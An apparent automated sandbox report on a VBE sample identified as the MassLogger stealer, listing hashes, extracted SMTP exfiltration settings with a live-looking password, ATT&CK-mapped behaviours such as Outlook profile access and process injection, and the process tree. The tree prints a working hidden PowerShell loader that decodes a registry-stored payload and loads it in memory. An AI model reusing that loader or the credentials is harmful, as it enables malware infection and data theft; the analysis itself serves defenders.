Analysis
-
max time kernel
143s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
04/07/2025, 12:03
Static task
static1
Behavioral task
behavioral1
Sample
light6645537.vbe
Resource
win10v2004-20250502-en
Behavioral task
behavioral2
Sample
light6645537.vbe
Resource
win11-20250502-en
General
-
Target
light6645537.vbe
-
Size
967KB
-
MD5
0001e2722e67b3b433f17963b3790430
-
SHA1
02c470648fa95b615a66ac0285474e7155f31e04
-
SHA256
424665f64a0552dc852e3f8774eae8950a2de260024f4b37a87ba275d3eb4674
-
SHA512
fa273b80724ebce888db330cc114a22422c8c6e710fc3b948bfbd7447ce053dca8e6b2f6bde47f537087adddb06895e6f1b339a8819d57263e2a53b98119ba0b
-
SSDEEP
24576:+zBnrwuNfwSvJeCxPiO0QS6XMkoodFMTRIo:h
Malware Config
Extracted
masslogger
-
exfiltration_mode
#SMTPEnabled
-
expire_time_date
2025-05-04
-
host_password
p1-Gl}8NkL[o2qr*
-
host_port
587
- host_receiver
- host_sender
-
host_server
mail.miniorangeman.com
-
ssl_slate
True
Signatures
-
MassLogger
Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.
-
Masslogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2364 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AddInProcess32.exe Key opened \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AddInProcess32.exe Key opened \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AddInProcess32.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 checkip.dyndns.org 13 reallyfreegeoip.org 14 reallyfreegeoip.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2364 set thread context of 3684 2364 powershell.exe 87 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2364 powershell.exe 2364 powershell.exe 3684 AddInProcess32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2364 powershell.exe Token: SeDebugPrivilege 3684 AddInProcess32.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 680 wrote to memory of 2364 680 WScript.exe 85 PID 680 wrote to memory of 2364 680 WScript.exe 85 PID 2364 wrote to memory of 3684 2364 powershell.exe 87 PID 2364 wrote to memory of 3684 2364 powershell.exe 87 PID 2364 wrote to memory of 3684 2364 powershell.exe 87 PID 2364 wrote to memory of 3684 2364 powershell.exe 87 PID 2364 wrote to memory of 3684 2364 powershell.exe 87 PID 2364 wrote to memory of 3684 2364 powershell.exe 87 PID 2364 wrote to memory of 3684 2364 powershell.exe 87 PID 2364 wrote to memory of 3684 2364 powershell.exe 87 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AddInProcess32.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AddInProcess32.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\light6645537.vbe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $r='HKCU:\Software\YSSUOWOXajxtsHt';$v='test';$d=gp $r;$a=[Convert]::FromBase64String(($d.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::Load($a);[hem.hem]::hem($r.Split('\')[-1])2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"3⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3684
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS"1⤵PID:5744
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD51cacd0362bf0f7c175193309f29b89b1
SHA19806970450b0294338bc13fd80b7ae56841d24b0
SHA256f9dd2982f5735013c18de076016a6a603ce7d3010be26c011117a9cbbef1d778
SHA512a85146b5d09f8865f95c8f6f3e4ad0bd091d1b2b39d56c1a5fbf823a344daf208f8f59a081af71989efe9b20a0de3d147cb89271a5dc9a34b8b505a8333aa507